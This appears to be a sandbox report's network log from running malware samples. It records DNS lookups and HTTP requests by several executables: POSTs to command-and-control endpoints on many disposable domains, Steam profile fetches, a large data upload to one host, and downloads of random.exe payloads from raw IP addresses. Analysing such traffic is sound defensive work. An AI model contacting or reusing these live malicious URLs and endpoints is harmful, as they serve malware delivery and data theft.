                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                        Cache-Control: no-cache
                        Date: Fri, 20 Dec 2024 04:46:48 GMT
                        Content-Length: 35588
                        Connection: keep-alive
                        Set-Cookie: sessionid=c31e616db9b3b2e8f32c34b5; Path=/; Secure; SameSite=None
                        Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                      • flag-us
                        DNS
                        lev-tolstoi.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        lev-tolstoi.com
                        IN A
                        Response
                        lev-tolstoi.com
                        IN A
                        172.67.157.254
                        lev-tolstoi.com
                        IN A
                        104.21.66.86
                      • flag-us
                        POST
                        https://lev-tolstoi.com/api
                        fcc74b3f6b.exe
                        Remote address:
                        172.67.157.254:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: lev-tolstoi.com
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=c1h3sn18feam0melj8je0288al; expires=Mon, 14 Apr 2025 22:33:28 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v48jgiFIV27HmOkGte144sW%2F03vFqtYquNtx%2BxwBuRLmukJR1kC%2BfpcagQuL%2Bff92s7SWNClOrTbNvFb1HZLDAkG35kUtE%2BnlM%2BxIxminc7NHVSSo6P4k4ANFoI7hFDy%2BT4%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfda5aba26538-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=48426&min_rtt=47072&rtt_var=11842&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=583&delivery_rate=79564&cwnd=252&unsent_bytes=0&cid=0eddaf907e02d14a&ts=228&x=0"
                      • flag-us
                        DNS
                        cheapptaxysu.click
                        4ab1990554.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        cheapptaxysu.click
                        IN A
                        Response
                        cheapptaxysu.click
                        IN A
                        172.67.177.88
                        cheapptaxysu.click
                        IN A
                        104.21.67.146
                      • flag-us
                        POST
                        https://cheapptaxysu.click/api
                        4ab1990554.exe
                        Remote address:
                        172.67.177.88:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: cheapptaxysu.click
                        Response
                        HTTP/1.1 403 Forbidden
                        Date: Fri, 20 Dec 2024 04:46:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Frame-Options: SAMEORIGIN
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2BlQ6HDHc5p36lLGP55hvQrH3xOAbzY0WwXpA2DQjLUq87HPi75IhOWLSO%2B7MLrGSpIflWDlu%2Bn%2B%2FIQMIlGw6lDkZkz2k2edGlHYuHgT2PkP1bGiYQ2rxZxwATy7kh1kQ5g6laM%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfda8abbe419d-LHR
                      • flag-us
                        POST
                        https://cheapptaxysu.click/api
                        4ab1990554.exe
                        Remote address:
                        172.67.177.88:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        Cookie: __cf_mw_byp=CUIqWzdHDLUvip1W0ExWhL1PZSOS3z5eoMrKYPzxAc4-1734670009-0.0.1.1-/api
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 42
                        Host: cheapptaxysu.click
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=2ce41stjfkcnqgcs3p9plu2m2o; expires=Mon, 14 Apr 2025 22:33:28 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HNEwLzqu%2FlaByZaV6HdZQOslHjRmFvv2WGR8JdrR05jjYk25iYsyQSKVISZs3U4vaPwKKerx29k0kG33XOwYg8hqiLJfmONCaEs3MzGbF5abDKKd%2FUIZvk5JYaMJg76bsB0tfx8%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfda90bf2419d-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=57270&min_rtt=48259&rtt_var=15704&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8133&recv_bytes=1044&delivery_rate=168177&cwnd=257&unsent_bytes=0&cid=0b9d7bf3c6ed5e4a&ts=342&x=0"
                      • flag-us
                        DNS
                        github.com
                        e57707a59c.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        github.com
                        IN A
                        Response
                        github.com
                        IN A
                        20.26.156.215
                      • flag-us
                        DNS
                        httpbin.org
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        httpbin.org
                        IN A
                        Response
                        httpbin.org
                        IN A
                        98.85.100.80
                        httpbin.org
                        IN A
                        34.226.108.155
                      • flag-us
                        DNS
                        httpbin.org
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        httpbin.org
                        IN AAAA
                        Response
                      • flag-us
                        DNS
                        home.twentytk20pn.top
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        home.twentytk20pn.top
                        IN A
                        Response
                        home.twentytk20pn.top
                        IN A
                        147.45.113.159
                      • flag-us
                        DNS
                        home.twentytk20pn.top
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        home.twentytk20pn.top
                        IN AAAA
                        Response
                      • flag-ru
                        POST
                        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                        16d019449f.exe
                        Remote address:
                        147.45.113.159:80
                        Request
                        POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                        Host: home.twentytk20pn.top
                        Accept: */*
                        Content-Type: application/json
                        Content-Length: 407045
                      • flag-us
                        DNS
                        bellflamre.click
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        bellflamre.click
                        IN A
                        Response
                      • flag-us
                        DNS
                        immureprech.biz
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        immureprech.biz
                        IN A
                        Response
                        immureprech.biz
                        IN A
                        45.77.249.79
                        immureprech.biz
                        IN A
                        104.131.68.180
                        immureprech.biz
                        IN A
                        178.62.201.34
                      • flag-us
                        DNS
                        deafeninggeh.biz
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        deafeninggeh.biz
                        IN A
                        Response
                        deafeninggeh.biz
                        IN A
                        45.77.249.79
                        deafeninggeh.biz
                        IN A
                        178.62.201.34
                        deafeninggeh.biz
                        IN A
                        104.131.68.180
                      • flag-us
                        DNS
                        effecterectz.xyz
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        effecterectz.xyz
                        IN A
                        Response
                      • flag-us
                        DNS
                        diffuculttan.xyz
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        diffuculttan.xyz
                        IN A
                        Response
                      • flag-us
                        DNS
                        debonairnukk.xyz
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        debonairnukk.xyz
                        IN A
                        Response
                      • flag-us
                        DNS
                        wrathful-jammy.cyou
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        wrathful-jammy.cyou
                        IN A
                        Response
                      • flag-us
                        DNS
                        awake-weaves.cyou
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        awake-weaves.cyou
                        IN A
                        Response
                      • flag-us
                        DNS
                        sordid-snaked.cyou
                        d5ca7bb125.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        sordid-snaked.cyou
                        IN A
                        Response
                      • flag-us
                        DNS
                        steamcommunity.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        steamcommunity.com
                        IN A
                        Response
                        steamcommunity.com
                        IN A
                        23.214.143.155
                      • flag-gb
                        GET
                        https://steamcommunity.com/profiles/76561199724331900
                        d5ca7bb125.exe
                        Remote address:
                        23.214.143.155:443
                        Request
                        GET /profiles/76561199724331900 HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Host: steamcommunity.com
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Content-Type: text/html; charset=UTF-8
                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                        Cache-Control: no-cache
                        Date: Fri, 20 Dec 2024 04:47:24 GMT
                        Content-Length: 35588
                        Connection: keep-alive
                        Set-Cookie: sessionid=84e294bb0b314f49a35904ed; Path=/; Secure; SameSite=None
                        Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                      • flag-us
                        POST
                        https://lev-tolstoi.com/api
                        d5ca7bb125.exe
                        Remote address:
                        172.67.157.254:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: lev-tolstoi.com
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:30 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=svpo6efjjv3c27m5v65iljc08g; expires=Mon, 14 Apr 2025 22:34:09 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q6GsIt9wrgxI3EQc9eN09i%2FTbkro1ww96bqlDicbivw9NWTTJu5heIlEwV1NceYDj7BLh2OvT0Y8iyW3Tl91j0qkG1IbC7Uy0XMkvYwaxP13%2BAq7Q3n7qPmcJ3bUyGEwJT8%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfea91c7693eb-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=49103&min_rtt=47845&rtt_var=15539&sent=6&recv=7&lost=0&retrans=1&sent_bytes=2851&recv_bytes=583&delivery_rate=74297&cwnd=253&unsent_bytes=0&cid=bd20dd412bea0deb&ts=225&x=0"
                      • flag-ru
                        GET
                        http://185.215.113.16/luma/random.exe
                        skotes.exe
                        Remote address:
                        185.215.113.16:80
                        Request
                        GET /luma/random.exe HTTP/1.1
                        Host: 185.215.113.16
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:33 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1880064
                        Last-Modified: Fri, 20 Dec 2024 03:52:53 GMT
                        Connection: keep-alive
                        ETag: "6764ea15-1cb000"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://185.215.113.16/steam/random.exe
                        skotes.exe
                        Remote address:
                        185.215.113.16:80
                        Request
                        GET /steam/random.exe HTTP/1.1
                        Host: 185.215.113.16
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:42 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 2911744
                        Last-Modified: Fri, 20 Dec 2024 03:53:04 GMT
                        Connection: keep-alive
                        ETag: "6764ea20-2c6e00"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://185.215.113.16/well/random.exe
                        skotes.exe
                        Remote address:
                        185.215.113.16:80
                        Request
                        GET /well/random.exe HTTP/1.1
                        Host: 185.215.113.16
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:46 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 969216
                        Last-Modified: Fri, 20 Dec 2024 03:50:38 GMT
                        Connection: keep-alive
                        ETag: "6764e98e-eca00"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://185.215.113.16/off/random.exe
                        skotes.exe
                        Remote address:
                        185.215.113.16:80
                        Request
                        GET /off/random.exe HTTP/1.1
                        Host: 185.215.113.16
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:59 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 2807808
                        Last-Modified: Fri, 20 Dec 2024 03:51:06 GMT
                        Connection: keep-alive
                        ETag: "6764e9aa-2ad800"
                        Accept-Ranges: bytes
                      • flag-us
                        DNS
                        sweepyribs.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        sweepyribs.lat
                        IN A
                        Response
                      • flag-us
                        POST
                        https://discokeyus.lat/api
                        dee2c68b58.exe
                        Remote address:
                        172.67.197.170:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: discokeyus.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=4vg9fdnifubqm3ircpnhu6ut3k; expires=Mon, 14 Apr 2025 22:34:20 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5iYe2QereTiHZ7H4DI3yC%2Fi0HsQDkmmTL9b%2F88bS8OKnMLFngaGgtZCUksQr4cIWPNdfsq1rKF3g3L0NqZffrZI4xobD2ge1oROS%2FNqskyCmnDV34y8%2FQht0Qn6pl7lPyw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfeedff17f652-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=59024&min_rtt=50510&rtt_var=27112&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=582&delivery_rate=69535&cwnd=253&unsent_bytes=0&cid=7172ce6525e21797&ts=340&x=0"
                      • flag-us
                        POST
                        https://necklacebudi.lat/api
                        dee2c68b58.exe
                        Remote address:
                        172.67.215.121:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: necklacebudi.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=15fkkpqbtq2p5h77t04p9orcsh; expires=Mon, 14 Apr 2025 22:34:24 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2HNSa%2BckabkaAAhNai7Lv36aMCxkxJuXBaTCZIxsFbgr7q0gV7TX1WPV9LToi0lvRyntfNohGqOhIBO9OJYbrI1Oy8P0HchIBPLqk80J8DaebCMjxmNFIQXCG6Mci1OMlwp"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff033b829457-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=55364&min_rtt=47523&rtt_var=14286&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=584&delivery_rate=71902&cwnd=253&unsent_bytes=0&cid=a6e3089f490183d6&ts=288&x=0"
                      • flag-us
                        POST
                        https://energyaffai.lat/api
                        dee2c68b58.exe
                        Remote address:
                        104.21.64.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: energyaffai.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=l60pn9h3c4qvd4agcagg6rh4e5; expires=Mon, 14 Apr 2025 22:34:24 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5ml57NHXx%2BR%2FAhFcyiTZ8AFUiUGCATtk1i5T5aueL82X2jsQCUQ9gQIEic4gKZSTGUECAo08fbA%2BPVV4IUJreEZW0Etwirb4l0IFVaXOlkkYfQCWXQj%2BM8HuPTBWWiANW8%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff078e529505-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50683&min_rtt=46970&rtt_var=19830&sent=7&recv=8&lost=0&retrans=1&sent_bytes=2931&recv_bytes=583&delivery_rate=41509&cwnd=254&unsent_bytes=0&cid=372cea3bfbe550f3&ts=577&x=0"
                      • flag-ru
                        GET
                        http://185.215.113.206/
                        718410bf88.exe
                        Remote address:
                        185.215.113.206:80
                        Request
                        GET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:46 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-ru
                        POST
                        http://185.215.113.206/c4becf79229cb002.php
                        718410bf88.exe
                        Remote address:
                        185.215.113.206:80
                        Request
                        POST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFI
                        Host: 185.215.113.206
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:46 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-us
                        POST
                        https://aspecteirs.lat/api
                        dee2c68b58.exe
                        Remote address:
                        172.67.157.253:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: aspecteirs.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=66phjrg6t8icimkcupb30n4lm2; expires=Mon, 14 Apr 2025 22:34:25 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4pmfUXw7H%2Bt9Azv81V7PMXaYpAsRosD%2BjECIEaAnFd3fUEsg1vqKkWUHFSV617NPQ8uFobvyYQ0vukkINE5UHUPnaRduOH470CgjPE41oCOMpiyQuxoN5JybeRA%2FT1W8zw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff09ec8def03-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50962&min_rtt=48444&rtt_var=14174&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=582&delivery_rate=75624&cwnd=253&unsent_bytes=0&cid=70f5778abfcdb6f3&ts=262&x=0"
                      • flag-us
                        POST
                        https://sustainskelet.lat/api
                        dee2c68b58.exe
                        Remote address:
                        104.21.48.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: sustainskelet.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:48 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=2dj95ric0u5etm2ski0n7jfogn; expires=Mon, 14 Apr 2025 22:34:27 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vl40s7gzwy%2BUWua4GuqC3rH%2BKKuqPwgqFNy4iY%2BgzbYi88BQ9g%2FXUy%2BOjQYTdoidFU%2BlySHnw3JrK7DAgdhrK9n%2BI8FpfptzZks3eAxJswRnhToRpR5siRpuIMqIOGwh9bEfeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff13cf0d951d-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=53986&min_rtt=52144&rtt_var=17980&sent=9&recv=8&lost=0&retrans=2&sent_bytes=3028&recv_bytes=585&delivery_rate=21992&cwnd=254&unsent_bytes=0&cid=6a5f18997bd2a4f5&ts=2199&x=0"
                      • flag-us
                        DNS
                        home.twentytk20pn.top
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        home.twentytk20pn.top
                        IN A
                        Response
                      • flag-us
                        DNS
                        home.twentytk20pn.top
                        16d019449f.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        home.twentytk20pn.top
                        IN AAAA
                        Response
                        home.twentytk20pn.top
                        IN A
                        147.45.113.159
                      • flag-ru
                        POST
                        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                        16d019449f.exe
                        Remote address:
                        147.45.113.159:80
                        Request
                        POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                        Host: home.twentytk20pn.top
                        Accept: */*
                        Content-Type: application/json
                        Content-Length: 407045
                        Response
                        HTTP/1.0 504 Gateway Time-out
                        Cache-Control: no-cache
                        Connection: close
